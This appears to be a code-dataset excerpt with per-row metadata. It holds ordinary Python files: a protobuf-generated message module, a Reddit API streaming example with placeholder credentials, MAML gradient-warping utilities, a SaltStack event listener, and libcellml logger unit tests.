from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import pose_pb2 as pose__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='projector.proto',
package='Indriya.Core.Msgs',
#syntax='proto2',
serialized_pb=_b('\n\x0fprojector.proto\x12\x11Indriya.Core.Msgs\x1a\npose.proto\"\xaa\x01\n\tProjector\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x0f\n\x07texture\x18\x02 \x01(\t\x12%\n\x04pose\x18\x03 \x01(\x0b\x32\x17.Indriya.Core.Msgs.Pose\x12\x12\n\x03\x66ov\x18\x04 \x01(\x01:\x05\x30.785\x12\x16\n\tnear_clip\x18\x05 \x01(\x01:\x03\x30.1\x12\x14\n\x08\x66\x61r_clip\x18\x06 \x01(\x01:\x02\x31\x30\x12\x15\n\x07\x65nabled\x18\x07 \x01(\x08:\x04true')
,
dependencies=[pose__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PROJECTOR = _descriptor.Descriptor(
name='Projector',
full_name='Indriya.Core.Msgs.Projector',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='Indriya.Core.Msgs.Projector.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='texture', full_name='Indriya.Core.Msgs.Projector.texture', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pose', full_name='Indriya.Core.Msgs.Projector.pose', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fov', full_name='Indriya.Core.Msgs.Projector.fov', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.785,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='near_clip', full_name='Indriya.Core.Msgs.Projector.near_clip', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='far_clip', full_name='Indriya.Core.Msgs.Projector.far_clip', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enabled', full_name='Indriya.Core.Msgs.Projector.enabled', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
#syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=51,
serialized_end=221,
)
_PROJECTOR.fields_by_name['pose'].message_type = pose__pb2._POSE
DESCRIPTOR.message_types_by_name['Projector'] = _PROJECTOR
Projector = _reflection.GeneratedProtocolMessageType('Projector', (_message.Message,), dict(
DESCRIPTOR = _PROJECTOR,
__module__ = 'projector_pb2'
# @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector)
))
_sym_db.RegisterMessage(Projector)
# @@protoc_insertion_point(module_scope)
| # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: projector.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import pose_pb2 as pose__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='projector.proto',
package='Indriya.Core.Msgs',
#syntax='proto2',
serialized_pb=_b('\n\x0fprojector.proto\x12\x11Indriya.Core.Msgs\x1a\npose.proto\"\xaa\x01\n\tProjector\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x0f\n\x07texture\x18\x02 \x01(\t\x12%\n\x04pose\x18\x03 \x01(\x0b\x32\x17.Indriya.Core.Msgs.Pose\x12\x12\n\x03\x66ov\x18\x04 \x01(\x01:\x05\x30.785\x12\x16\n\tnear_clip\x18\x05 \x01(\x01:\x03\x30.1\x12\x14\n\x08\x66\x61r_clip\x18\x06 \x01(\x01:\x02\x31\x30\x12\x15\n\x07\x65nabled\x18\x07 \x01(\x08:\x04true')
,
dependencies=[pose__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PROJECTOR = _descriptor.Descriptor(
name='Projector',
full_name='Indriya.Core.Msgs.Projector',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='Indriya.Core.Msgs.Projector.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='texture', full_name='Indriya.Core.Msgs.Projector.texture', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pose', full_name='Indriya.Core.Msgs.Projector.pose', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fov', full_name='Indriya.Core.Msgs.Projector.fov', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.785,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='near_clip', full_name='Indriya.Core.Msgs.Projector.near_clip', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='far_clip', full_name='Indriya.Core.Msgs.Projector.far_clip', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enabled', full_name='Indriya.Core.Msgs.Projector.enabled', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
#syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=51,
serialized_end=221,
)
_PROJECTOR.fields_by_name['pose'].message_type = pose__pb2._POSE
DESCRIPTOR.message_types_by_name['Projector'] = _PROJECTOR
Projector = _reflection.GeneratedProtocolMessageType('Projector', (_message.Message,), dict(
DESCRIPTOR = _PROJECTOR,
__module__ = 'projector_pb2'
# @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector)
))
_sym_db.RegisterMessage(Projector)
# @@protoc_insertion_point(module_scope)
| en | 0.474464 | # Generated by the protocol buffer compiler. DO NOT EDIT! # source: projector.proto # @@protoc_insertion_point(imports) #syntax='proto2', #syntax='proto2', # @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector) # @@protoc_insertion_point(module_scope) | 1.478034 | 1 |
example.py | JeremySimpson/redditstream | 0 | 6612377 | <reponame>JeremySimpson/redditstream
import logging
from stream import RedditStream
URL_REDDIT_ALL_SUBMISSIONS = 'https://oauth.reddit.com/r/all/new'
def main():
USERNAME = 'usename_here'
PASSWORD = '<PASSWORD>'
CLIENT_ID = 'client_id_here'
CLIENT_SECRET = 'client_secret_here'
USER_AGENT = 'your_user_agent'
logging.basicConfig()
rs = RedditStream(USERNAME, PASSWORD, CLIENT_ID, CLIENT_SECRET, USER_AGENT)
for e in rs.stream_listing(URL_REDDIT_ALL_SUBMISSIONS):
print e
if __name__ == '__main__':
main()
| import logging
from stream import RedditStream
URL_REDDIT_ALL_SUBMISSIONS = 'https://oauth.reddit.com/r/all/new'
def main():
USERNAME = 'usename_here'
PASSWORD = '<PASSWORD>'
CLIENT_ID = 'client_id_here'
CLIENT_SECRET = 'client_secret_here'
USER_AGENT = 'your_user_agent'
logging.basicConfig()
rs = RedditStream(USERNAME, PASSWORD, CLIENT_ID, CLIENT_SECRET, USER_AGENT)
for e in rs.stream_listing(URL_REDDIT_ALL_SUBMISSIONS):
print e
if __name__ == '__main__':
main() | none | 1 | 2.554448 | 3 | |
maml/utils.py | jdieter31/pytorch-maml | 0 | 6612378 | <reponame>jdieter31/pytorch-maml<filename>maml/utils.py
import torch
from collections import OrderedDict
from torchmeta.modules import MetaModule
from .model import BatchParameter
from .transformer_metric import TransformerMetric
from .constant_metric import ConstantMetric
from .expm import torch_expm as expm
def compute_accuracy(logits, targets):
"""Compute the accuracy"""
with torch.no_grad():
if logits.dim() == 2:
_, predictions = torch.max(logits, dim=1)
accuracy = torch.mean(predictions.eq(targets).float())
else:
_, predictions = torch.max(logits, dim=2)
accuracy = torch.mean(predictions.eq(targets).float(), dim=-1)
return accuracy.detach().cpu().numpy()
def tensors_to_device(tensors, device=torch.device('cpu')):
"""Place a collection of tensors in a specific device"""
if isinstance(tensors, torch.Tensor):
return tensors.to(device=device)
elif isinstance(tensors, (list, tuple)):
return type(tensors)(tensors_to_device(tensor, device=device)
for tensor in tensors)
elif isinstance(tensors, (dict, OrderedDict)):
return type(tensors)([(name, tensors_to_device(tensor, device=device))
for (name, tensor) in tensors.items()])
else:
raise NotImplementedError()
class ToTensor1D(object):
"""Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision,
this converts numpy arrays regardless of the number of dimensions.
Converts automatically the array to `float32`.
"""
def __call__(self, array):
return torch.from_numpy(array.astype('float32'))
def __repr__(self):
return self.__class__.__name__ + '()'
def make_warp_model(model, constant=False):
metric_params = []
for parameter in model.parameters():
if isinstance(parameter, BatchParameter):
metric_params.append(parameter)
"""
for layer in model.modules():
if isinstance(layer, BatchLinear):
metric_params.append(layer.weight)
"""
if constant:
return ConstantMetric(metric_params)
else:
return TransformerMetric(metric_params)
def kronecker_warp(grad, kronecker_matrices) -> torch.Tensor:
"""
Function for doing Kronecker based warping of gradient batches of an
m x n matrix parameter
Params:
grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n]
kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker
matrices to do the warping. First element of tuple is of shape
[meta_batch_size, batch_size n, n] second is of shape
[meta_batch_size, batch_size, m, m]
"""
input_matrices = kronecker_matrices[0]
output_matrices = kronecker_matrices[1]
all_matrices = input_matrices + output_matrices
grad = grad.sum(dim=-3)
grad_size = grad.size()
first_matrix = all_matrices[0]
first_matrix = first_matrix.view(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = grad.view(-1, all_matrices[1].size(-1), first_matrix.size(-1))
first_matrix = first_matrix.unsqueeze(1).expand(
first_matrix.size(0), temp.size(0) // first_matrix.size(0), *first_matrix.size()[1:]
).reshape(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = torch.bmm(temp, first_matrix)
right_size = first_matrix.size(-1)
for i, matrix in enumerate(all_matrices[1:]):
matrix = matrix.view(-1, matrix.size(-2), matrix.size(-1))
matrix = matrix.unsqueeze(1).expand(
matrix.size(0), temp.size(0) // matrix.size(0), *matrix.size()[1:]
).reshape(-1, matrix.size(-2), matrix.size(-1))
temp = torch.bmm(matrix, temp)
if i < len(all_matrices) - 2:
right_size *= matrix.size(-1)
temp = temp.view(-1, all_matrices[i + 2].size(-1), right_size)
return temp.view(grad_size)
def gradient_update_parameters_warp(model,
loss,
params=None,
warp_model=None,
step_size=0.5,
first_order=False,
state=None):
"""Update of the meta-parameters with one step of gradient descent on the
loss function.
Parameters
----------
model : `torchmeta.modules.MetaModule` instance
The model.
loss : `torch.Tensor` instance
The value of the inner-loss. This is the result of the training dataset
through the loss function.
params : `collections.OrderedDict` instance, optional
Dictionary containing the meta-parameters of the model. If `None`, then
the values stored in `model.meta_named_parameters()` are used. This is
useful for running multiple steps of gradient descent as the inner-loop.
step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)
The step size in the gradient update. If an `OrderedDict`, then the
keys must match the keys in `params`.
first_order : bool (default: `False`)
If `True`, then the first order approximation of MAML is used.
Returns
-------
updated_params : `collections.OrderedDict` instance
Dictionary containing the updated meta-parameters of the model, with one
gradient update wrt. the inner-loss.
"""
if not isinstance(model, MetaModule):
raise ValueError('The model must be an instance of `torchmeta.modules.'
'MetaModule`, got `{0}`'.format(type(model)))
if params is None:
params = OrderedDict(model.meta_named_parameters())
param_jacobs_lst = [[] for _ in range(len(params))]
for i in range(loss.size(0)):
grads = torch.autograd.grad(loss[i], params.values(), retain_graph=True, create_graph=not first_order)
for j, grad in enumerate(grads):
param_jacobs_lst[j].append(grad)
param_jacobs = [torch.stack(param_jacob, dim=1) for param_jacob in param_jacobs_lst]
if warp_model is not None:
warp_model_input = []
for param in warp_model.warp_parameters:
if param.collect_input:
warp_model_input.append([param.input_data, param.grad_data])
kronecker_matrix_logs = warp_model(warp_model_input)
kronecker_matrices = []
for kronecker_matrix_list in kronecker_matrix_logs:
input_matrices = kronecker_matrix_list[0]
output_matrices = kronecker_matrix_list[1]
exp_input_matrices = []
for matrix in input_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_input_matrices.append(matrix)
exp_output_matrices = []
for matrix in output_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_output_matrices.append(matrix)
kronecker_matrices.append([exp_input_matrices, exp_output_matrices])
updated_params = OrderedDict()
if isinstance(step_size, (dict, OrderedDict)):
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size[name] * grad
else:
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size * grad
return updated_params
| import torch
from collections import OrderedDict
from torchmeta.modules import MetaModule
from .model import BatchParameter
from .transformer_metric import TransformerMetric
from .constant_metric import ConstantMetric
from .expm import torch_expm as expm
def compute_accuracy(logits, targets):
"""Compute the accuracy"""
with torch.no_grad():
if logits.dim() == 2:
_, predictions = torch.max(logits, dim=1)
accuracy = torch.mean(predictions.eq(targets).float())
else:
_, predictions = torch.max(logits, dim=2)
accuracy = torch.mean(predictions.eq(targets).float(), dim=-1)
return accuracy.detach().cpu().numpy()
def tensors_to_device(tensors, device=torch.device('cpu')):
"""Place a collection of tensors in a specific device"""
if isinstance(tensors, torch.Tensor):
return tensors.to(device=device)
elif isinstance(tensors, (list, tuple)):
return type(tensors)(tensors_to_device(tensor, device=device)
for tensor in tensors)
elif isinstance(tensors, (dict, OrderedDict)):
return type(tensors)([(name, tensors_to_device(tensor, device=device))
for (name, tensor) in tensors.items()])
else:
raise NotImplementedError()
class ToTensor1D(object):
"""Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision,
this converts numpy arrays regardless of the number of dimensions.
Converts automatically the array to `float32`.
"""
def __call__(self, array):
return torch.from_numpy(array.astype('float32'))
def __repr__(self):
return self.__class__.__name__ + '()'
def make_warp_model(model, constant=False):
metric_params = []
for parameter in model.parameters():
if isinstance(parameter, BatchParameter):
metric_params.append(parameter)
"""
for layer in model.modules():
if isinstance(layer, BatchLinear):
metric_params.append(layer.weight)
"""
if constant:
return ConstantMetric(metric_params)
else:
return TransformerMetric(metric_params)
def kronecker_warp(grad, kronecker_matrices) -> torch.Tensor:
"""
Function for doing Kronecker based warping of gradient batches of an
m x n matrix parameter
Params:
grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n]
kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker
matrices to do the warping. First element of tuple is of shape
[meta_batch_size, batch_size n, n] second is of shape
[meta_batch_size, batch_size, m, m]
"""
input_matrices = kronecker_matrices[0]
output_matrices = kronecker_matrices[1]
all_matrices = input_matrices + output_matrices
grad = grad.sum(dim=-3)
grad_size = grad.size()
first_matrix = all_matrices[0]
first_matrix = first_matrix.view(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = grad.view(-1, all_matrices[1].size(-1), first_matrix.size(-1))
first_matrix = first_matrix.unsqueeze(1).expand(
first_matrix.size(0), temp.size(0) // first_matrix.size(0), *first_matrix.size()[1:]
).reshape(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = torch.bmm(temp, first_matrix)
right_size = first_matrix.size(-1)
for i, matrix in enumerate(all_matrices[1:]):
matrix = matrix.view(-1, matrix.size(-2), matrix.size(-1))
matrix = matrix.unsqueeze(1).expand(
matrix.size(0), temp.size(0) // matrix.size(0), *matrix.size()[1:]
).reshape(-1, matrix.size(-2), matrix.size(-1))
temp = torch.bmm(matrix, temp)
if i < len(all_matrices) - 2:
right_size *= matrix.size(-1)
temp = temp.view(-1, all_matrices[i + 2].size(-1), right_size)
return temp.view(grad_size)
def gradient_update_parameters_warp(model,
loss,
params=None,
warp_model=None,
step_size=0.5,
first_order=False,
state=None):
"""Update of the meta-parameters with one step of gradient descent on the
loss function.
Parameters
----------
model : `torchmeta.modules.MetaModule` instance
The model.
loss : `torch.Tensor` instance
The value of the inner-loss. This is the result of the training dataset
through the loss function.
params : `collections.OrderedDict` instance, optional
Dictionary containing the meta-parameters of the model. If `None`, then
the values stored in `model.meta_named_parameters()` are used. This is
useful for running multiple steps of gradient descent as the inner-loop.
step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5)
The step size in the gradient update. If an `OrderedDict`, then the
keys must match the keys in `params`.
first_order : bool (default: `False`)
If `True`, then the first order approximation of MAML is used.
Returns
-------
updated_params : `collections.OrderedDict` instance
Dictionary containing the updated meta-parameters of the model, with one
gradient update wrt. the inner-loss.
"""
if not isinstance(model, MetaModule):
raise ValueError('The model must be an instance of `torchmeta.modules.'
'MetaModule`, got `{0}`'.format(type(model)))
if params is None:
params = OrderedDict(model.meta_named_parameters())
param_jacobs_lst = [[] for _ in range(len(params))]
for i in range(loss.size(0)):
grads = torch.autograd.grad(loss[i], params.values(), retain_graph=True, create_graph=not first_order)
for j, grad in enumerate(grads):
param_jacobs_lst[j].append(grad)
param_jacobs = [torch.stack(param_jacob, dim=1) for param_jacob in param_jacobs_lst]
if warp_model is not None:
warp_model_input = []
for param in warp_model.warp_parameters:
if param.collect_input:
warp_model_input.append([param.input_data, param.grad_data])
kronecker_matrix_logs = warp_model(warp_model_input)
kronecker_matrices = []
for kronecker_matrix_list in kronecker_matrix_logs:
input_matrices = kronecker_matrix_list[0]
output_matrices = kronecker_matrix_list[1]
exp_input_matrices = []
for matrix in input_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_input_matrices.append(matrix)
exp_output_matrices = []
for matrix in output_matrices:
#exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1))))
#exp_matrix = exp_matrix.reshape(matrix.size())
#exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))
#exp_matrix = torch.bmm(exp_matrix, exp_matrix)
#exp_matrix = exp_matrix.reshape(matrix.size())
exp_output_matrices.append(matrix)
kronecker_matrices.append([exp_input_matrices, exp_output_matrices])
updated_params = OrderedDict()
if isinstance(step_size, (dict, OrderedDict)):
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size[name] * grad
else:
for i, ((name, param), grad) in enumerate(zip(params.items(), param_jacobs)):
if warp_model is not None:
grad = kronecker_warp(grad, kronecker_matrices[i])
updated_params[name] = param - step_size * grad
return updated_params | en | 0.529667 | Compute the accuracy Place a collection of tensors in a specific device Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision, this converts numpy arrays regardless of the number of dimensions. Converts automatically the array to `float32`. for layer in model.modules(): if isinstance(layer, BatchLinear): metric_params.append(layer.weight) Function for doing Kronecker based warping of gradient batches of an m x n matrix parameter Params: grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n] kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker matrices to do the warping. First element of tuple is of shape [meta_batch_size, batch_size n, n] second is of shape [meta_batch_size, batch_size, m, m] Update of the meta-parameters with one step of gradient descent on the loss function. Parameters ---------- model : `torchmeta.modules.MetaModule` instance The model. loss : `torch.Tensor` instance The value of the inner-loss. This is the result of the training dataset through the loss function. params : `collections.OrderedDict` instance, optional Dictionary containing the meta-parameters of the model. If `None`, then the values stored in `model.meta_named_parameters()` are used. This is useful for running multiple steps of gradient descent as the inner-loop. step_size : int, `torch.Tensor`, or `collections.OrderedDict` instance (default: 0.5) The step size in the gradient update. If an `OrderedDict`, then the keys must match the keys in `params`. first_order : bool (default: `False`) If `True`, then the first order approximation of MAML is used. Returns ------- updated_params : `collections.OrderedDict` instance Dictionary containing the updated meta-parameters of the model, with one gradient update wrt. the inner-loss. #exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1))) #exp_matrix = torch.bmm(exp_matrix, exp_matrix) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = torch.matrix_exp(matrix.reshape((-1, matrix.size(-2), matrix.size(-1)))) #exp_matrix = exp_matrix.reshape(matrix.size()) #exp_matrix = matrix.reshape((-1, matrix.size(-2), matrix.size(-1))) #exp_matrix = torch.bmm(exp_matrix, exp_matrix) #exp_matrix = exp_matrix.reshape(matrix.size()) | 2.508671 | 3 |
strongr/clouddomain/model/salt/salteventtranslator.py | bigr-erasmusmc/StrongR | 0 | 6612379 | import threading
import fnmatch
import salt.config
import salt.utils.event
import strongr.core
import strongr.clouddomain.factory.intradomaineventfactory
import strongr.clouddomain.factory.interdomaineventfactory
import strongr.clouddomain.model.gateways
import logging
class SaltEventTranslator(threading.Thread):
def run(self):
opts = salt.config.client_config(strongr.core.Core.config().clouddomain.OpenNebula.salt_config + '/master')
inter_domain_event_factory = strongr.clouddomain.model.gateways.Gateways.inter_domain_event_factory()
event = salt.utils.event.get_event(
'master',
sock_dir=opts['sock_dir'],
transport=opts['transport'],
opts=opts)
while True:
ret = event.get_event(full=True)
if ret is None:
continue
try:
if fnmatch.fnmatch(ret['tag'], 'salt/job/*/ret/*'):
data = ret['data']
if 'jid' in data and 'return' in data and 'retcode' in data:
job_finished_event = inter_domain_event_factory.newJobFinishedEvent(data['jid'], data['return'], data['retcode'])
strongr.core.Core.inter_domain_events_publisher().publish(job_finished_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/creating'):
data = ret['data']
if 'name' in data:
vmcreated_event = inter_domain_event_factory.newVmCreatedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmcreated_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/created'):
data = ret['data']
if 'name' in data:
vmready_event = inter_domain_event_factory.newVmReadyEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmready_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/destroyed'):
data = ret['data']
if 'name' in data:
vmdestroyed_event = inter_domain_event_factory.newVmDestroyedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmdestroyed_event)
except Exception as e: # thread must always continue running
logging.getLogger('SaltEventTranslator').warning(str(e))
pass
| import threading
import fnmatch
import salt.config
import salt.utils.event
import strongr.core
import strongr.clouddomain.factory.intradomaineventfactory
import strongr.clouddomain.factory.interdomaineventfactory
import strongr.clouddomain.model.gateways
import logging
class SaltEventTranslator(threading.Thread):
def run(self):
opts = salt.config.client_config(strongr.core.Core.config().clouddomain.OpenNebula.salt_config + '/master')
inter_domain_event_factory = strongr.clouddomain.model.gateways.Gateways.inter_domain_event_factory()
event = salt.utils.event.get_event(
'master',
sock_dir=opts['sock_dir'],
transport=opts['transport'],
opts=opts)
while True:
ret = event.get_event(full=True)
if ret is None:
continue
try:
if fnmatch.fnmatch(ret['tag'], 'salt/job/*/ret/*'):
data = ret['data']
if 'jid' in data and 'return' in data and 'retcode' in data:
job_finished_event = inter_domain_event_factory.newJobFinishedEvent(data['jid'], data['return'], data['retcode'])
strongr.core.Core.inter_domain_events_publisher().publish(job_finished_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/creating'):
data = ret['data']
if 'name' in data:
vmcreated_event = inter_domain_event_factory.newVmCreatedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmcreated_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/created'):
data = ret['data']
if 'name' in data:
vmready_event = inter_domain_event_factory.newVmReadyEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmready_event)
elif fnmatch.fnmatch(ret['tag'], 'salt/cloud/*/destroyed'):
data = ret['data']
if 'name' in data:
vmdestroyed_event = inter_domain_event_factory.newVmDestroyedEvent(data['name'])
strongr.core.Core.inter_domain_events_publisher().publish(vmdestroyed_event)
except Exception as e: # thread must always continue running
logging.getLogger('SaltEventTranslator').warning(str(e))
pass
| en | 0.93866 | # thread must always continue running | 1.829654 | 2 |
tests/bindings/python/test_logger.py | 0u812/libcellml | 0 | 6612380 | <filename>tests/bindings/python/test_logger.py
#
# Tests the Error class bindings
#
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
| <filename>tests/bindings/python/test_logger.py
#
# Tests the Error class bindings
#
import unittest
class LoggerTestCase(unittest.TestCase):
def test_create_destroy(self):
from libcellml import Logger
# Test create/copy/destroy
x = Logger()
del(x)
y = Logger()
z = Logger(y)
del(y, z)
def test_add_error(self):
from libcellml import Logger, Error
# void addError(const ErrorPtr error)
x = Logger()
x.addError(Error())
def test_error_count(self):
from libcellml import Logger, Error
# size_t errorCount()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
self.assertEqual(x.errorCount(), 1)
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
def test_error(self):
from libcellml import Logger, Error
# ErrorPtr error(size_t index)
x = Logger()
self.assertIsNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertIsNone(x.error(-1))
e = Error()
e.setKind(Error.Kind.MODEL)
x.addError(e)
self.assertIsNotNone(x.error(0))
self.assertIsNone(x.error(1))
self.assertEqual(x.error(0).kind(), Error.Kind.MODEL)
def test_clear_errors(self):
from libcellml import Logger, Error
# void clearErrors()
x = Logger()
self.assertEqual(x.errorCount(), 0)
x.addError(Error())
x.addError(Error())
self.assertEqual(x.errorCount(), 2)
x.clearErrors()
self.assertEqual(x.errorCount(), 0)
if __name__ == '__main__':
unittest.main()
| en | 0.14874 | # # Tests the Error class bindings # # Test create/copy/destroy # void addError(const ErrorPtr error) # size_t errorCount() # ErrorPtr error(size_t index) # void clearErrors() | 2.801898 | 3 |
test/vtgate_buffer.py | ramitsurana/vitess | 0 | 6612381 | #!/usr/bin/env python
#
